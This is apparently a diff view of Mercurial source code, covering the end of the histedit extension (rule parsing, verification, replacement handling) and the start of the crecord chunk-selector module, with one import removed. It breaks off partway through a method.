2298 abortdirty()
2303
2299
2304 parentctx, replacements = actobj.continueclean()
2300 parentctx, replacements = actobj.continueclean()
2305
2301
2306 state.parentctxnode = parentctx.node()
2302 state.parentctxnode = parentctx.node()
2307 state.replacements.extend(replacements)
2303 state.replacements.extend(replacements)
2308
2304
2309 return state
2305 return state
2310
2306
2311
2307
2312 def between(repo, old, new, keep):
2308 def between(repo, old, new, keep):
2313 """select and validate the set of revision to edit
2309 """select and validate the set of revision to edit
2314
2310
2315 When keep is false, the specified set can't have children."""
2311 When keep is false, the specified set can't have children."""
2316 revs = repo.revs(b'%n::%n', old, new)
2312 revs = repo.revs(b'%n::%n', old, new)
2317 if revs and not keep:
2313 if revs and not keep:
2318 rewriteutil.precheck(repo, revs, b'edit')
2314 rewriteutil.precheck(repo, revs, b'edit')
2319 if repo.revs(b'(%ld) and merge()', revs):
2315 if repo.revs(b'(%ld) and merge()', revs):
2320 raise error.Abort(_(b'cannot edit history that contains merges'))
2316 raise error.Abort(_(b'cannot edit history that contains merges'))
2321 return pycompat.maplist(repo.changelog.node, revs)
2317 return pycompat.maplist(repo.changelog.node, revs)
2322
2318
2323
2319
2324 def ruleeditor(repo, ui, actions, editcomment=b""):
2320 def ruleeditor(repo, ui, actions, editcomment=b""):
2325 """open an editor to edit rules
2321 """open an editor to edit rules
2326
2322
2327 rules are in the format [ [act, ctx], ...] like in state.rules
2323 rules are in the format [ [act, ctx], ...] like in state.rules
2328 """
2324 """
2329 if repo.ui.configbool(b"experimental", b"histedit.autoverb"):
2325 if repo.ui.configbool(b"experimental", b"histedit.autoverb"):
2330 newact = util.sortdict()
2326 newact = util.sortdict()
2331 for act in actions:
2327 for act in actions:
2332 ctx = repo[act.node]
2328 ctx = repo[act.node]
2333 summary = _getsummary(ctx)
2329 summary = _getsummary(ctx)
2334 fword = summary.split(b' ', 1)[0].lower()
2330 fword = summary.split(b' ', 1)[0].lower()
2335 added = False
2331 added = False
2336
2332
2337 # if it doesn't end with the special character '!' just skip this
2333 # if it doesn't end with the special character '!' just skip this
2338 if fword.endswith(b'!'):
2334 if fword.endswith(b'!'):
2339 fword = fword[:-1]
2335 fword = fword[:-1]
2340 if fword in primaryactions | secondaryactions | tertiaryactions:
2336 if fword in primaryactions | secondaryactions | tertiaryactions:
2341 act.verb = fword
2337 act.verb = fword
2342 # get the target summary
2338 # get the target summary
2343 tsum = summary[len(fword) + 1 :].lstrip()
2339 tsum = summary[len(fword) + 1 :].lstrip()
2344 # safe but slow: reverse iterate over the actions so we
2340 # safe but slow: reverse iterate over the actions so we
2345 # don't clash on two commits having the same summary
2341 # don't clash on two commits having the same summary
2346 for na, l in reversed(list(pycompat.iteritems(newact))):
2342 for na, l in reversed(list(pycompat.iteritems(newact))):
2347 actx = repo[na.node]
2343 actx = repo[na.node]
2348 asum = _getsummary(actx)
2344 asum = _getsummary(actx)
2349 if asum == tsum:
2345 if asum == tsum:
2350 added = True
2346 added = True
2351 l.append(act)
2347 l.append(act)
2352 break
2348 break
2353
2349
2354 if not added:
2350 if not added:
2355 newact[act] = []
2351 newact[act] = []
2356
2352
2357 # copy over and flatten the new list
2353 # copy over and flatten the new list
2358 actions = []
2354 actions = []
2359 for na, l in pycompat.iteritems(newact):
2355 for na, l in pycompat.iteritems(newact):
2360 actions.append(na)
2356 actions.append(na)
2361 actions += l
2357 actions += l
2362
2358
2363 rules = b'\n'.join([act.torule() for act in actions])
2359 rules = b'\n'.join([act.torule() for act in actions])
2364 rules += b'\n\n'
2360 rules += b'\n\n'
2365 rules += editcomment
2361 rules += editcomment
2366 rules = ui.edit(
2362 rules = ui.edit(
2367 rules,
2363 rules,
2368 ui.username(),
2364 ui.username(),
2369 {b'prefix': b'histedit'},
2365 {b'prefix': b'histedit'},
2370 repopath=repo.path,
2366 repopath=repo.path,
2371 action=b'histedit',
2367 action=b'histedit',
2372 )
2368 )
2373
2369
2374 # Save edit rules in .hg/histedit-last-edit.txt in case
2370 # Save edit rules in .hg/histedit-last-edit.txt in case
2375 # the user needs to ask for help after something
2371 # the user needs to ask for help after something
2376 # surprising happens.
2372 # surprising happens.
2377 with repo.vfs(b'histedit-last-edit.txt', b'wb') as f:
2373 with repo.vfs(b'histedit-last-edit.txt', b'wb') as f:
2378 f.write(rules)
2374 f.write(rules)
2379
2375
2380 return rules
2376 return rules
2381
2377
2382
2378
2383 def parserules(rules, state):
2379 def parserules(rules, state):
2384 """Read the histedit rules string and return list of action objects """
2380 """Read the histedit rules string and return list of action objects """
2385 rules = [
2381 rules = [
2386 l
2382 l
2387 for l in (r.strip() for r in rules.splitlines())
2383 for l in (r.strip() for r in rules.splitlines())
2388 if l and not l.startswith(b'#')
2384 if l and not l.startswith(b'#')
2389 ]
2385 ]
2390 actions = []
2386 actions = []
2391 for r in rules:
2387 for r in rules:
2392 if b' ' not in r:
2388 if b' ' not in r:
2393 raise error.ParseError(_(b'malformed line "%s"') % r)
2389 raise error.ParseError(_(b'malformed line "%s"') % r)
2394 verb, rest = r.split(b' ', 1)
2390 verb, rest = r.split(b' ', 1)
2395
2391
2396 if verb not in actiontable:
2392 if verb not in actiontable:
2397 raise error.ParseError(_(b'unknown action "%s"') % verb)
2393 raise error.ParseError(_(b'unknown action "%s"') % verb)
2398
2394
2399 action = actiontable[verb].fromrule(state, rest)
2395 action = actiontable[verb].fromrule(state, rest)
2400 actions.append(action)
2396 actions.append(action)
2401 return actions
2397 return actions
2402
2398
2403
2399
2404 def warnverifyactions(ui, repo, actions, state, ctxs):
2400 def warnverifyactions(ui, repo, actions, state, ctxs):
2405 try:
2401 try:
2406 verifyactions(actions, state, ctxs)
2402 verifyactions(actions, state, ctxs)
2407 except error.ParseError:
2403 except error.ParseError:
2408 if repo.vfs.exists(b'histedit-last-edit.txt'):
2404 if repo.vfs.exists(b'histedit-last-edit.txt'):
2409 ui.warn(
2405 ui.warn(
2410 _(
2406 _(
2411 b'warning: histedit rules saved '
2407 b'warning: histedit rules saved '
2412 b'to: .hg/histedit-last-edit.txt\n'
2408 b'to: .hg/histedit-last-edit.txt\n'
2413 )
2409 )
2414 )
2410 )
2415 raise
2411 raise
2416
2412
2417
2413
2418 def verifyactions(actions, state, ctxs):
2414 def verifyactions(actions, state, ctxs):
2419 """Verify that there exists exactly one action per given changeset and
2415 """Verify that there exists exactly one action per given changeset and
2420 other constraints.
2416 other constraints.
2421
2417
2422 Will abort if there are to many or too few rules, a malformed rule,
2418 Will abort if there are to many or too few rules, a malformed rule,
2423 or a rule on a changeset outside of the user-given range.
2419 or a rule on a changeset outside of the user-given range.
2424 """
2420 """
2425 expected = {c.node() for c in ctxs}
2421 expected = {c.node() for c in ctxs}
2426 seen = set()
2422 seen = set()
2427 prev = None
2423 prev = None
2428
2424
2429 if actions and actions[0].verb in [b'roll', b'fold']:
2425 if actions and actions[0].verb in [b'roll', b'fold']:
2430 raise error.ParseError(
2426 raise error.ParseError(
2431 _(b'first changeset cannot use verb "%s"') % actions[0].verb
2427 _(b'first changeset cannot use verb "%s"') % actions[0].verb
2432 )
2428 )
2433
2429
2434 for action in actions:
2430 for action in actions:
2435 action.verify(prev, expected, seen)
2431 action.verify(prev, expected, seen)
2436 prev = action
2432 prev = action
2437 if action.node is not None:
2433 if action.node is not None:
2438 seen.add(action.node)
2434 seen.add(action.node)
2439 missing = sorted(expected - seen) # sort to stabilize output
2435 missing = sorted(expected - seen) # sort to stabilize output
2440
2436
2441 if state.repo.ui.configbool(b'histedit', b'dropmissing'):
2437 if state.repo.ui.configbool(b'histedit', b'dropmissing'):
2442 if len(actions) == 0:
2438 if len(actions) == 0:
2443 raise error.ParseError(
2439 raise error.ParseError(
2444 _(b'no rules provided'),
2440 _(b'no rules provided'),
2445 hint=_(b'use strip extension to remove commits'),
2441 hint=_(b'use strip extension to remove commits'),
2446 )
2442 )
2447
2443
2448 drops = [drop(state, n) for n in missing]
2444 drops = [drop(state, n) for n in missing]
2449 # put the in the beginning so they execute immediately and
2445 # put the in the beginning so they execute immediately and
2450 # don't show in the edit-plan in the future
2446 # don't show in the edit-plan in the future
2451 actions[:0] = drops
2447 actions[:0] = drops
2452 elif missing:
2448 elif missing:
2453 raise error.ParseError(
2449 raise error.ParseError(
2454 _(b'missing rules for changeset %s') % node.short(missing[0]),
2450 _(b'missing rules for changeset %s') % node.short(missing[0]),
2455 hint=_(
2451 hint=_(
2456 b'use "drop %s" to discard, see also: '
2452 b'use "drop %s" to discard, see also: '
2457 b"'hg help -e histedit.config'"
2453 b"'hg help -e histedit.config'"
2458 )
2454 )
2459 % node.short(missing[0]),
2455 % node.short(missing[0]),
2460 )
2456 )
2461
2457
2462
2458
2463 def adjustreplacementsfrommarkers(repo, oldreplacements):
2459 def adjustreplacementsfrommarkers(repo, oldreplacements):
2464 """Adjust replacements from obsolescence markers
2460 """Adjust replacements from obsolescence markers
2465
2461
2466 Replacements structure is originally generated based on
2462 Replacements structure is originally generated based on
2467 histedit's state and does not account for changes that are
2463 histedit's state and does not account for changes that are
2468 not recorded there. This function fixes that by adding
2464 not recorded there. This function fixes that by adding
2469 data read from obsolescence markers"""
2465 data read from obsolescence markers"""
2470 if not obsolete.isenabled(repo, obsolete.createmarkersopt):
2466 if not obsolete.isenabled(repo, obsolete.createmarkersopt):
2471 return oldreplacements
2467 return oldreplacements
2472
2468
2473 unfi = repo.unfiltered()
2469 unfi = repo.unfiltered()
2474 get_rev = unfi.changelog.index.get_rev
2470 get_rev = unfi.changelog.index.get_rev
2475 obsstore = repo.obsstore
2471 obsstore = repo.obsstore
2476 newreplacements = list(oldreplacements)
2472 newreplacements = list(oldreplacements)
2477 oldsuccs = [r[1] for r in oldreplacements]
2473 oldsuccs = [r[1] for r in oldreplacements]
2478 # successors that have already been added to succstocheck once
2474 # successors that have already been added to succstocheck once
2479 seensuccs = set().union(
2475 seensuccs = set().union(
2480 *oldsuccs
2476 *oldsuccs
2481 ) # create a set from an iterable of tuples
2477 ) # create a set from an iterable of tuples
2482 succstocheck = list(seensuccs)
2478 succstocheck = list(seensuccs)
2483 while succstocheck:
2479 while succstocheck:
2484 n = succstocheck.pop()
2480 n = succstocheck.pop()
2485 missing = get_rev(n) is None
2481 missing = get_rev(n) is None
2486 markers = obsstore.successors.get(n, ())
2482 markers = obsstore.successors.get(n, ())
2487 if missing and not markers:
2483 if missing and not markers:
2488 # dead end, mark it as such
2484 # dead end, mark it as such
2489 newreplacements.append((n, ()))
2485 newreplacements.append((n, ()))
2490 for marker in markers:
2486 for marker in markers:
2491 nsuccs = marker[1]
2487 nsuccs = marker[1]
2492 newreplacements.append((n, nsuccs))
2488 newreplacements.append((n, nsuccs))
2493 for nsucc in nsuccs:
2489 for nsucc in nsuccs:
2494 if nsucc not in seensuccs:
2490 if nsucc not in seensuccs:
2495 seensuccs.add(nsucc)
2491 seensuccs.add(nsucc)
2496 succstocheck.append(nsucc)
2492 succstocheck.append(nsucc)
2497
2493
2498 return newreplacements
2494 return newreplacements
2499
2495
2500
2496
2501 def processreplacement(state):
2497 def processreplacement(state):
2502 """process the list of replacements to return
2498 """process the list of replacements to return
2503
2499
2504 1) the final mapping between original and created nodes
2500 1) the final mapping between original and created nodes
2505 2) the list of temporary node created by histedit
2501 2) the list of temporary node created by histedit
2506 3) the list of new commit created by histedit"""
2502 3) the list of new commit created by histedit"""
2507 replacements = adjustreplacementsfrommarkers(state.repo, state.replacements)
2503 replacements = adjustreplacementsfrommarkers(state.repo, state.replacements)
2508 allsuccs = set()
2504 allsuccs = set()
2509 replaced = set()
2505 replaced = set()
2510 fullmapping = {}
2506 fullmapping = {}
2511 # initialize basic set
2507 # initialize basic set
2512 # fullmapping records all operations recorded in replacement
2508 # fullmapping records all operations recorded in replacement
2513 for rep in replacements:
2509 for rep in replacements:
2514 allsuccs.update(rep[1])
2510 allsuccs.update(rep[1])
2515 replaced.add(rep[0])
2511 replaced.add(rep[0])
2516 fullmapping.setdefault(rep[0], set()).update(rep[1])
2512 fullmapping.setdefault(rep[0], set()).update(rep[1])
2517 new = allsuccs - replaced
2513 new = allsuccs - replaced
2518 tmpnodes = allsuccs & replaced
2514 tmpnodes = allsuccs & replaced
2519 # Reduce content fullmapping into direct relation between original nodes
2515 # Reduce content fullmapping into direct relation between original nodes
2520 # and final node created during history edition
2516 # and final node created during history edition
2521 # Dropped changeset are replaced by an empty list
2517 # Dropped changeset are replaced by an empty list
2522 toproceed = set(fullmapping)
2518 toproceed = set(fullmapping)
2523 final = {}
2519 final = {}
2524 while toproceed:
2520 while toproceed:
2525 for x in list(toproceed):
2521 for x in list(toproceed):
2526 succs = fullmapping[x]
2522 succs = fullmapping[x]
2527 for s in list(succs):
2523 for s in list(succs):
2528 if s in toproceed:
2524 if s in toproceed:
2529 # non final node with unknown closure
2525 # non final node with unknown closure
2530 # We can't process this now
2526 # We can't process this now
2531 break
2527 break
2532 elif s in final:
2528 elif s in final:
2533 # non final node, replace with closure
2529 # non final node, replace with closure
2534 succs.remove(s)
2530 succs.remove(s)
2535 succs.update(final[s])
2531 succs.update(final[s])
2536 else:
2532 else:
2537 final[x] = succs
2533 final[x] = succs
2538 toproceed.remove(x)
2534 toproceed.remove(x)
2539 # remove tmpnodes from final mapping
2535 # remove tmpnodes from final mapping
2540 for n in tmpnodes:
2536 for n in tmpnodes:
2541 del final[n]
2537 del final[n]
2542 # we expect all changes involved in final to exist in the repo
2538 # we expect all changes involved in final to exist in the repo
2543 # turn `final` into list (topologically sorted)
2539 # turn `final` into list (topologically sorted)
2544 get_rev = state.repo.changelog.index.get_rev
2540 get_rev = state.repo.changelog.index.get_rev
2545 for prec, succs in final.items():
2541 for prec, succs in final.items():
2546 final[prec] = sorted(succs, key=get_rev)
2542 final[prec] = sorted(succs, key=get_rev)
2547
2543
2548 # computed topmost element (necessary for bookmark)
2544 # computed topmost element (necessary for bookmark)
2549 if new:
2545 if new:
2550 newtopmost = sorted(new, key=state.repo.changelog.rev)[-1]
2546 newtopmost = sorted(new, key=state.repo.changelog.rev)[-1]
2551 elif not final:
2547 elif not final:
2552 # Nothing rewritten at all. we won't need `newtopmost`
2548 # Nothing rewritten at all. we won't need `newtopmost`
2553 # It is the same as `oldtopmost` and `processreplacement` know it
2549 # It is the same as `oldtopmost` and `processreplacement` know it
2554 newtopmost = None
2550 newtopmost = None
2555 else:
2551 else:
2556 # every body died. The newtopmost is the parent of the root.
2552 # every body died. The newtopmost is the parent of the root.
2557 r = state.repo.changelog.rev
2553 r = state.repo.changelog.rev
2558 newtopmost = state.repo[sorted(final, key=r)[0]].p1().node()
2554 newtopmost = state.repo[sorted(final, key=r)[0]].p1().node()
2559
2555
2560 return final, tmpnodes, new, newtopmost
2556 return final, tmpnodes, new, newtopmost
2561
2557
2562
2558
2563 def movetopmostbookmarks(repo, oldtopmost, newtopmost):
2559 def movetopmostbookmarks(repo, oldtopmost, newtopmost):
2564 """Move bookmark from oldtopmost to newly created topmost
2560 """Move bookmark from oldtopmost to newly created topmost
2565
2561
2566 This is arguably a feature and we may only want that for the active
2562 This is arguably a feature and we may only want that for the active
2567 bookmark. But the behavior is kept compatible with the old version for now.
2563 bookmark. But the behavior is kept compatible with the old version for now.
2568 """
2564 """
2569 if not oldtopmost or not newtopmost:
2565 if not oldtopmost or not newtopmost:
2570 return
2566 return
2571 oldbmarks = repo.nodebookmarks(oldtopmost)
2567 oldbmarks = repo.nodebookmarks(oldtopmost)
2572 if oldbmarks:
2568 if oldbmarks:
2573 with repo.lock(), repo.transaction(b'histedit') as tr:
2569 with repo.lock(), repo.transaction(b'histedit') as tr:
2574 marks = repo._bookmarks
2570 marks = repo._bookmarks
2575 changes = []
2571 changes = []
2576 for name in oldbmarks:
2572 for name in oldbmarks:
2577 changes.append((name, newtopmost))
2573 changes.append((name, newtopmost))
2578 marks.applychanges(repo, tr, changes)
2574 marks.applychanges(repo, tr, changes)
2579
2575
2580
2576
2581 def cleanupnode(ui, repo, nodes, nobackup=False):
2577 def cleanupnode(ui, repo, nodes, nobackup=False):
2582 """strip a group of nodes from the repository
2578 """strip a group of nodes from the repository
2583
2579
2584 The set of node to strip may contains unknown nodes."""
2580 The set of node to strip may contains unknown nodes."""
2585 with repo.lock():
2581 with repo.lock():
2586 # do not let filtering get in the way of the cleanse
2582 # do not let filtering get in the way of the cleanse
2587 # we should probably get rid of obsolescence marker created during the
2583 # we should probably get rid of obsolescence marker created during the
2588 # histedit, but we currently do not have such information.
2584 # histedit, but we currently do not have such information.
2589 repo = repo.unfiltered()
2585 repo = repo.unfiltered()
2590 # Find all nodes that need to be stripped
2586 # Find all nodes that need to be stripped
2591 # (we use %lr instead of %ln to silently ignore unknown items)
2587 # (we use %lr instead of %ln to silently ignore unknown items)
2592 has_node = repo.changelog.index.has_node
2588 has_node = repo.changelog.index.has_node
2593 nodes = sorted(n for n in nodes if has_node(n))
2589 nodes = sorted(n for n in nodes if has_node(n))
2594 roots = [c.node() for c in repo.set(b"roots(%ln)", nodes)]
2590 roots = [c.node() for c in repo.set(b"roots(%ln)", nodes)]
2595 if roots:
2591 if roots:
2596 backup = not nobackup
2592 backup = not nobackup
2597 repair.strip(ui, repo, roots, backup=backup)
2593 repair.strip(ui, repo, roots, backup=backup)
2598
2594
2599
2595
2600 def stripwrapper(orig, ui, repo, nodelist, *args, **kwargs):
2596 def stripwrapper(orig, ui, repo, nodelist, *args, **kwargs):
2601 if isinstance(nodelist, bytes):
2597 if isinstance(nodelist, bytes):
2602 nodelist = [nodelist]
2598 nodelist = [nodelist]
2603 state = histeditstate(repo)
2599 state = histeditstate(repo)
2604 if state.inprogress():
2600 if state.inprogress():
2605 state.read()
2601 state.read()
2606 histedit_nodes = {
2602 histedit_nodes = {
2607 action.node for action in state.actions if action.node
2603 action.node for action in state.actions if action.node
2608 }
2604 }
2609 common_nodes = histedit_nodes & set(nodelist)
2605 common_nodes = histedit_nodes & set(nodelist)
2610 if common_nodes:
2606 if common_nodes:
2611 raise error.Abort(
2607 raise error.Abort(
2612 _(b"histedit in progress, can't strip %s")
2608 _(b"histedit in progress, can't strip %s")
2613 % b', '.join(node.short(x) for x in common_nodes)
2609 % b', '.join(node.short(x) for x in common_nodes)
2614 )
2610 )
2615 return orig(ui, repo, nodelist, *args, **kwargs)
2611 return orig(ui, repo, nodelist, *args, **kwargs)
2616
2612
2617
2613
2618 extensions.wrapfunction(repair, b'strip', stripwrapper)
2614 extensions.wrapfunction(repair, b'strip', stripwrapper)
2619
2615
2620
2616
2621 def summaryhook(ui, repo):
2617 def summaryhook(ui, repo):
2622 state = histeditstate(repo)
2618 state = histeditstate(repo)
2623 if not state.inprogress():
2619 if not state.inprogress():
2624 return
2620 return
2625 state.read()
2621 state.read()
2626 if state.actions:
2622 if state.actions:
2627 # i18n: column positioning for "hg summary"
2623 # i18n: column positioning for "hg summary"
2628 ui.write(
2624 ui.write(
2629 _(b'hist: %s (histedit --continue)\n')
2625 _(b'hist: %s (histedit --continue)\n')
2630 % (
2626 % (
2631 ui.label(_(b'%d remaining'), b'histedit.remaining')
2627 ui.label(_(b'%d remaining'), b'histedit.remaining')
2632 % len(state.actions)
2628 % len(state.actions)
2633 )
2629 )
2634 )
2630 )
2635
2631
2636
2632
2637 def extsetup(ui):
2633 def extsetup(ui):
2638 cmdutil.summaryhooks.add(b'histedit', summaryhook)
2634 cmdutil.summaryhooks.add(b'histedit', summaryhook)
2639 statemod.addunfinished(
2635 statemod.addunfinished(
2640 b'histedit',
2636 b'histedit',
2641 fname=b'histedit-state',
2637 fname=b'histedit-state',
2642 allowcommit=True,
2638 allowcommit=True,
2643 continueflag=True,
2639 continueflag=True,
2644 abortfunc=hgaborthistedit,
2640 abortfunc=hgaborthistedit,
2645 )
2641 )
@@ -1,2029 +1,2026 b''
1 # stuff related specifically to patch manipulation / parsing
1 # stuff related specifically to patch manipulation / parsing
2 #
2 #
3 # Copyright 2008 Mark Edgington <edgimar@gmail.com>
3 # Copyright 2008 Mark Edgington <edgimar@gmail.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 #
7 #
8 # This code is based on the Mark Edgington's crecord extension.
8 # This code is based on the Mark Edgington's crecord extension.
9 # (Itself based on Bryan O'Sullivan's record extension.)
9 # (Itself based on Bryan O'Sullivan's record extension.)
10
10
11 from __future__ import absolute_import
11 from __future__ import absolute_import
12
12
13 import locale
14 import os
13 import os
15 import re
14 import re
16 import signal
15 import signal
17
16
18 from .i18n import _
17 from .i18n import _
19 from .pycompat import (
18 from .pycompat import (
20 getattr,
19 getattr,
21 open,
20 open,
22 )
21 )
23 from . import (
22 from . import (
24 encoding,
23 encoding,
25 error,
24 error,
26 patch as patchmod,
25 patch as patchmod,
27 pycompat,
26 pycompat,
28 scmutil,
27 scmutil,
29 util,
28 util,
30 )
29 )
31 from .utils import stringutil
30 from .utils import stringutil
32
31
stringio = util.stringio

# patch comments based on the git one
# Boilerplate appended to a patch/hunk opened in the user's editor; as the
# text itself says, lines starting with '#' are stripped before the edited
# content is re-parsed.
diffhelptext = _(
    """# To remove '-' lines, make them ' ' lines (context).
# To remove '+' lines, delete them.
# Lines starting with # will be removed from the patch.
"""
)

# additional guidance appended when a single hunk is being edited
hunkhelptext = _(
    """#
# If the patch applies cleanly, the edited hunk will immediately be
# added to the record list. If it does not apply cleanly, a rejects file
# will be generated. You can use that when you try again. If all lines
# of the hunk are removed, then the edit is aborted and the hunk is left
# unchanged.
"""
)

# additional guidance appended when a whole patch is being edited
patchhelptext = _(
    """#
# If the patch applies cleanly, the edited patch will immediately
# be finalised. If it does not apply cleanly, rejects files will be
# generated. You can use those when you try again.
"""
)
60
59
# curses is optional: it may be missing entirely or present but broken, so
# probe for it here and leave a falsy marker that callers (checkcurses)
# can test before using any curses UI.
try:
    import curses
    import curses.ascii

    # touching an attribute verifies the module is actually usable, not a
    # partial install (raises AttributeError in that case)
    curses.error
except (ImportError, AttributeError):
    curses = False
68
67
69
68
class fallbackerror(error.Abort):
    """Error that indicates the client should try to fallback to text mode."""

    # Inherits from error.Abort so that existing behavior is preserved if the
    # calling code does not know how to fallback.
    # (No body: the subclass exists purely as a marker type.)
75
74
76
75
def checkcurses(ui):
    """Return True if the user wants to use curses

    This method returns True if curses is found (and that python is built with
    it) and that the user has the correct flag for the ui.
    """
    if not curses:
        # the import probe above failed; curses UI is unavailable
        return False
    return ui.interface(b"chunkselector") == b"curses"
84
83
85
84
class patchnode(object):
    """abstract class for patch graph nodes
    (i.e. patchroot, header, hunk, hunkline)

    Concrete subclasses form a three-level tree: patch -> uiheader ->
    uihunk -> uihunkline.  nextitem/previtem implement depth-first
    traversal over that tree in terms of the abstract sibling/child/parent
    accessors below.
    """

    def firstchild(self):
        raise NotImplementedError(b"method must be implemented by subclass")

    def lastchild(self):
        raise NotImplementedError(b"method must be implemented by subclass")

    def allchildren(self):
        """Return a list of all of the direct children of this node"""
        raise NotImplementedError(b"method must be implemented by subclass")

    def nextsibling(self):
        """
        Return the closest next item of the same type where there are no items
        of different types between the current item and this closest item.
        If no such item exists, return None.
        """
        raise NotImplementedError(b"method must be implemented by subclass")

    def prevsibling(self):
        """
        Return the closest previous item of the same type where there are no
        items of different types between the current item and this closest item.
        If no such item exists, return None.
        """
        raise NotImplementedError(b"method must be implemented by subclass")

    def parentitem(self):
        raise NotImplementedError(b"method must be implemented by subclass")

    def nextitem(self, skipfolded=True):
        """
        Try to return the next item closest to this item, regardless of item's
        type (header, hunk, or hunkline).

        If skipfolded == True, and the current item is folded, then the child
        items that are hidden due to folding will be skipped when determining
        the next item.

        If it is not possible to get the next item, return None.
        """
        # not every node type has a 'folded' flag (hunk lines don't), so
        # treat a missing attribute as "not folded"
        try:
            itemfolded = self.folded
        except AttributeError:
            itemfolded = False
        if skipfolded and itemfolded:
            # folded: jump over the hidden children straight to the next
            # sibling, or failing that the parent's next sibling
            nextitem = self.nextsibling()
            if nextitem is None:
                try:
                    nextitem = self.parentitem().nextsibling()
                except AttributeError:
                    # parentitem() returned None (top of tree)
                    nextitem = None
            return nextitem
        else:
            # try child
            item = self.firstchild()
            if item is not None:
                return item

            # else try next sibling
            item = self.nextsibling()
            if item is not None:
                return item

            try:
                # else try parent's next sibling
                item = self.parentitem().nextsibling()
                if item is not None:
                    return item

                # else return grandparent's next sibling (or None)
                return self.parentitem().parentitem().nextsibling()

            except AttributeError:  # parent and/or grandparent was None
                return None

    def previtem(self):
        """
        Try to return the previous item closest to this item, regardless of
        item's type (header, hunk, or hunkline).

        If it is not possible to get the previous item, return None.
        """
        # try previous sibling's last child's last child,
        # else try previous sibling's last child, else try previous sibling
        prevsibling = self.prevsibling()
        if prevsibling is not None:
            prevsiblinglastchild = prevsibling.lastchild()
            if (prevsiblinglastchild is not None) and not prevsibling.folded:
                prevsiblinglclc = prevsiblinglastchild.lastchild()
                if (
                    prevsiblinglclc is not None
                ) and not prevsiblinglastchild.folded:
                    return prevsiblinglclc
                else:
                    return prevsiblinglastchild
            else:
                return prevsibling

        # try parent (or None)
        return self.parentitem()
191
190
192
191
class patch(patchnode, list):  # todo: rename patchroot
    """
    list of header objects representing the patch.
    """

    def __init__(self, headerlist):
        self.extend(headerlist)
        # every header keeps a backreference to its owning patch object
        for hdr in self:
            hdr.patch = self
203
202
204
203
class uiheader(patchnode):
    """patch header

    Wraps a (non-ui) patchmod header and adds the applied/partial/folded
    UI state the chunk selector needs.  Unknown attributes are delegated
    to the wrapped header via __getattr__.

    xxx shouldn't we move this to mercurial/patch.py ?
    """

    def __init__(self, header):
        self.nonuiheader = header
        # flag to indicate whether to apply this chunk
        self.applied = True
        # flag which only affects the status display indicating if a node's
        # children are partially applied (i.e. some applied, some not).
        self.partial = False

        # flag to indicate whether to display as folded/unfolded to user
        self.folded = True

        # list of all headers in patch
        self.patch = None

        # flag is False if this header was ever unfolded from initial state
        self.neverunfolded = True
        # NOTE: 'self.hunks' on the right-hand side is not set on this
        # instance yet, so the read goes through __getattr__ and fetches
        # the wrapped header's hunks, which we re-wrap as uihunks here.
        self.hunks = [uihunk(h, self) for h in self.hunks]

    def prettystr(self):
        # render via the wrapped header's pretty() into an in-memory buffer
        x = stringio()
        self.pretty(x)
        return x.getvalue()

    def nextsibling(self):
        numheadersinpatch = len(self.patch)
        indexofthisheader = self.patch.index(self)

        if indexofthisheader < numheadersinpatch - 1:
            nextheader = self.patch[indexofthisheader + 1]
            return nextheader
        else:
            return None

    def prevsibling(self):
        indexofthisheader = self.patch.index(self)
        if indexofthisheader > 0:
            previousheader = self.patch[indexofthisheader - 1]
            return previousheader
        else:
            return None

    def parentitem(self):
        """
        there is no 'real' parent item of a header that can be selected,
        so return None.
        """
        return None

    def firstchild(self):
        """return the first child of this item, if one exists. otherwise
        None."""
        if len(self.hunks) > 0:
            return self.hunks[0]
        else:
            return None

    def lastchild(self):
        """return the last child of this item, if one exists. otherwise
        None."""
        if len(self.hunks) > 0:
            return self.hunks[-1]
        else:
            return None

    def allchildren(self):
        """return a list of all of the direct children of this node"""
        return self.hunks

    def __getattr__(self, name):
        # delegate anything we don't define to the wrapped header
        return getattr(self.nonuiheader, name)
281
280
282
281
class uihunkline(patchnode):
    """represents a changed line in a hunk"""

    def __init__(self, linetext, hunk):
        self.linetext = linetext
        self.applied = True
        # backreference to the uihunk that owns this line
        self.hunk = hunk
        # lines are never foldable today, but previtem() consults this
        # flag on every node type, so it must exist
        self.folded = False

    def prettystr(self):
        return self.linetext

    def nextsibling(self):
        siblings = self.hunk.changedlines
        pos = siblings.index(self)
        if pos + 1 < len(siblings):
            return siblings[pos + 1]
        return None

    def prevsibling(self):
        siblings = self.hunk.changedlines
        pos = siblings.index(self)
        if pos > 0:
            return siblings[pos - 1]
        return None

    def parentitem(self):
        """return the parent to the current item"""
        return self.hunk

    def firstchild(self):
        """return the first child of this item, if one exists. otherwise
        None."""
        # hunk-lines don't have children
        return None

    def lastchild(self):
        """return the last child of this item, if one exists. otherwise
        None."""
        # hunk-lines don't have children
        return None
331
330
332
331
class uihunk(patchnode):
    """ui patch hunk, wraps a hunk and keep track of ui behavior

    Unknown attributes (added, removed, before, after, fromline, toline,
    proc, ...) are delegated to the wrapped hunk via __getattr__.
    """

    maxcontext = 3

    def __init__(self, hunk, header):
        self._hunk = hunk
        self.changedlines = [uihunkline(line, self) for line in hunk.hunk]
        self.header = header
        # used at end for detecting how many removed lines were un-applied
        # (self.removed is read from the wrapped hunk via __getattr__)
        self.originalremoved = self.removed

        # flag to indicate whether to display as folded/unfolded to user
        self.folded = True
        # flag to indicate whether to apply this chunk
        self.applied = True
        # flag which only affects the status display indicating if a node's
        # children are partially applied (i.e. some applied, some not).
        self.partial = False

    def nextsibling(self):
        numhunksinheader = len(self.header.hunks)
        indexofthishunk = self.header.hunks.index(self)

        if indexofthishunk < numhunksinheader - 1:
            nexthunk = self.header.hunks[indexofthishunk + 1]
            return nexthunk
        else:
            return None

    def prevsibling(self):
        indexofthishunk = self.header.hunks.index(self)
        if indexofthishunk > 0:
            previoushunk = self.header.hunks[indexofthishunk - 1]
            return previoushunk
        else:
            return None

    def parentitem(self):
        """return the parent to the current item"""
        return self.header

    def firstchild(self):
        """return the first child of this item, if one exists. otherwise
        None."""
        if len(self.changedlines) > 0:
            return self.changedlines[0]
        else:
            return None

    def lastchild(self):
        """return the last child of this item, if one exists. otherwise
        None."""
        if len(self.changedlines) > 0:
            return self.changedlines[-1]
        else:
            return None

    def allchildren(self):
        """return a list of all of the direct children of this node"""
        return self.changedlines

    def countchanges(self):
        """changedlines -> (n+,n-)

        Count only the lines the user left applied.
        """
        add = len(
            [
                l
                for l in self.changedlines
